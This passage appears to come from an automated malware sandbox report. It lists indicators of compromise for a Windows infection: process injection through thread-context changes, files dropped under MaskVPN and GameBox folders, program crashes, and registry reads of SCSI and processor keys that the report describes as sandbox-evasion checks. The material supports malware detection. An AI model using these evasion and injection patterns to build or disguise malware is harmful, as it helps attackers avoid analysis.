description pid Process procid_target PID 4988 set thread context of 4372 4988 ii6bmnn9p_oIqp2fsxJz8bSj.exe 121 PID 3620 set thread context of 420 3620 fUf8GFAg_E3p4seDzYoR9QhL.exe 141 PID 3632 set thread context of 772 3632 xlwGhHKzOqtDuIGACjLOdzuw.exe 342 PID 4836 set thread context of 6748 4836 jIlgGsLgcRdga5MKGVReTCua.exe 233 PID 6280 set thread context of 6688 6280 yiFKNT0nr7imekCPhRNhbie_.exe 240 PID 5900 set thread context of 7048 5900 uAbmvuYWyPNMcJ17bWYvR_iG.exe 294 PID 7092 set thread context of 7764 7092 8450.exe 385 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\MaskVPN\driver\win764\is-MGELO.tmp Setup.tmp File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-ORNOA.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-RBKM0.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 7ly35PFpELh0zl4A71KGHssh.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe Setup.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\libass.dll msedge.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\javaw.exe msedge.exe File created C:\Program Files (x86)\MaskVPN\is-JS72C.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-6KB94.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\version MaskVPNUpdate.exe File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-6HOIH.tmp Setup.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-VSSCG.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-IBI91.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-1DQK3.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-P12DC.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-S67NP.tmp Setup.tmp File opened for modification C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe msedge.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\unins000.dat msedge.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-4UBCS.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-ATVRC.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-S4551.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-PAQKE.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-8N036.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-N6E6U.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\MaskVPN\is-MTM0P.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-IM3D0.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-1H8OS.tmp Setup.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Setup.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-HN6FL.tmp msedge.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-D5L1R.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe Setup.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-CCCTG.tmp ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\is-15A9D.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 7ly35PFpELh0zl4A71KGHssh.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-Q44D5.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-QAVNF.tmp Setup.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-A08AA.tmp Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-U1094.tmp msedge.exe File created C:\Program Files (x86)\MaskVPN\is-OF5CN.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-TS392.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-IUP8F.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe Setup.exe -
Drops file in Windows directory 30 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI650C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI26A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3E8D.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSI636D.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFE5C8E86008F635D1.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI1180.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\SystemTemp\~DF46CA172CC4BDF622.TMP msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Installer\MSI4B40.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF800CB647F92BE127.TMP msiexec.exe File created C:\Windows\Installer\f767bc3.msi msiexec.exe File created C:\Windows\SystemTemp\~DF1DCA15CAB3F12217.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI667C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI567C.tmp msiexec.exe File opened for modification C:\Windows\Installer\f767bc3.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI9F3A.tmp msiexec.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSIB35.tmp msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe File opened for modification C:\Windows\Installer\MSIF876.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSI2825.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
pid pid_target Process procid_target 396 3240 WerFault.exe 99 3776 4876 WerFault.exe 120 1412 4372 WerFault.exe 121 3496 3980 WerFault.exe 89 2696 3852 WerFault.exe 100 1480 4196 WerFault.exe 80 3340 1540 WerFault.exe 152 5280 2708 WerFault.exe 172 5780 5876 WerFault.exe 217 1192 1848 WerFault.exe 243 784 6688 WerFault.exe 240 2128 5924 WerFault.exe 189 6024 6032 WerFault.exe 204 4044 5892 WerFault.exe 215 1044 4652 WerFault.exe 279 4860 5576 WerFault.exe 178 5500 5916 WerFault.exe 274 6356 1028 WerFault.exe 185 5504 7020 WerFault.exe 246 6708 784 WerFault.exe 285 7060 5324 WerFault.exe 289 5136 4368 WerFault.exe 257 1848 7684 WerFault.exe 365 7500 7628 WerFault.exe 408 3848 4348 WerFault.exe 417 3580 7472 WerFault.exe 433 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fUf8GFAg_E3p4seDzYoR9QhL.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fUf8GFAg_E3p4seDzYoR9QhL.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision VPN.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 72DD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried 